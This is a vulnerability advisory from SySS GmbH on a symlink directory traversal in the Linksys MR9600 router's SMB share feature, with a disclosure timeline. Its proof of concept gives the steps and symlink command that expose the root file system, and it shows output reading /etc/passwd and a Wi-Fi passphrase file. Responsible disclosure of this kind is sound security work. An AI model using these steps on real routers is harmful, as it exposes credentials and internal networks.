-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-046 Product: Linksys Dual-Band Mesh-WLAN WiFi 6 Router (MR9600) Manufacturer: Linksys Affected Version(s): Firmware versions below 2.0.5 Tested Version(s): Firmware version 2.0.5 Vulnerability Type: Symlink Directory Traversal Risk Level: High Solution Status: Open Manufacturer Notification: 2021-07-26 Solution Date: -- Public Disclosure: 2022-02-16 CVE Reference: Not yet assigned Author of Advisory: Dr. Matthias Kesenheimer, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Linksys MR9600 is a Dual-Band WiFi 6 router manufactured by Linksys. Among many other features, the router is capable of providing storage media as SMB shares in the network. This feature, also known as network-attached storage (NAS), can be exploited by an attacker to gain access to the router's complete internal file system. Due to this issue, attackers are able to read important configuration files and password hashes. This in turn carries the risk that an attacker could gain access to the internal network from within the guest network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: To exploit this issue, attackers require authenticated access to a writable share. If there are no writeable shares on the network yet, an attacker with physical access to the router can plug in a specially prepared USB storage device into the designated ports. The storage device is then automatically mounted and made available on the network as an SMB share. By accessing the SMB share and generating a symbolic link to the root directory, the file system is opened to directory traversal. This issue may also be exploited through a writable share accessible by guest accounts. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): To exploit this vulnerability, the following steps are required: - - Format a USB storage device to NTFS - - Create a symbolic link to the root directory via the command $ ln -d -s / slash - - Plug in the USB storage device into a designated port and wait until the SMB share is available on the network - - Browse to the share and open the directory "slash" - - The complete internal file system should now be accessible via the symlink "slash" The following examples show that full read permissions to the file system exist: $ cat slash/etc/passwd root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin quagga:x:44:44:Quagga:/var/empty:/bin/nologin firewall:x:66:66:Firewall:/var/empty:/bin/nologin file_admin:x:999:999:Linux User,,,:/mnt/ftp:/bin/sh admin:x:1000:0:File User,,,:/tmp/ftp/admin_mnt:/bin/sh guest:x:1001:1001:File User,,,:/tmp/ftp/guest_mnt:/bin/sh $ cat slash/tmp/wifi_virtual_settings.conf [...] wl0_ssid: Linksys-SySS wl0_encryption: aes wl0_passphrase: 5up3r53cur3p455w0rd [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: More information: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-07-06: Vulnerability discovered 2021-07-26: Vulnerability reported to manufacturer 2021-08-16: Manufacturer responded with promise to provide feedback 2021-09-10: Asked again for the current status 2021-09-10: Manufacturer states that the problem is being worked on with vigor 2021-10-08: Asked again for the current status 2021-10-28: Manufacturer still did not provide a satisfactory answer 2022-02-01: Notice of upcoming publication communicated ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website https://www.linksys.com/mesh-routers/linksys-dual-band-mesh-wifi-6-router-mr9600/p/p-mr9600/ [2] SySS Security Advisory SYSS-2021-046 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-046.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Matthias Kesenheimer of SySS GmbH. E-Mail: matthias.kesenheimer@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Kesenheimer.asc Key ID: 0x15E203385E96D04E Key Fingerprint: B259 18D6 49F6 FD35 8F5E 485E 15E2 0338 5E96 D04E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQGzBAEBCgAdFiEEslkY1kn2/TWPXkheFeIDOF6W0E4FAmH5A6IACgkQFeIDOF6W 0E44MQwAxE0tTcVP2DCSacobITkKG1zFGB9gOeFKbQavdfsBnq4QJiNjV26KvIeu RUQkOs+G6vHVNTUFfoLwUJEjfjklhcpvZj0CQK8OfrMWCym8Bsh6oEg9xsf/zSZd l9JQOanOHY7c/+OS85hcU4/Vo6ol1sK7kCHuI/buHx2pBp5NtkYaKuE9YRhuJKiZ 9XPydxua9xmZzxq2PFDD7wl5sTsLu/bH9KD0jOCW4suk2M43lk3J4AdWzPYIkurX L64e2IbF9Cdhmto+s5iBDQht762P+8ZDLIVVm/bG3+9ns6a4/yjgCu+XLPOKVo2s QGShMvJw/EOJ8uxgiYVsbtWneO+/X898iudtS/H1xmkUnpKINuXecq7RWKA4rElt ZKDLpGPdUtgrFUb7OHn67WV5J6APOV8nDSNfJqucoNPrDjFeYXKGkLbnMx6oa6x0 2n2my5H7hMNlguX0tvA/3kU7O0TFwzLwNtKVslIqCWTtw57EB8nsmyGIsia52UIG MgYu+CQy =lk2V -----END PGP SIGNATURE-----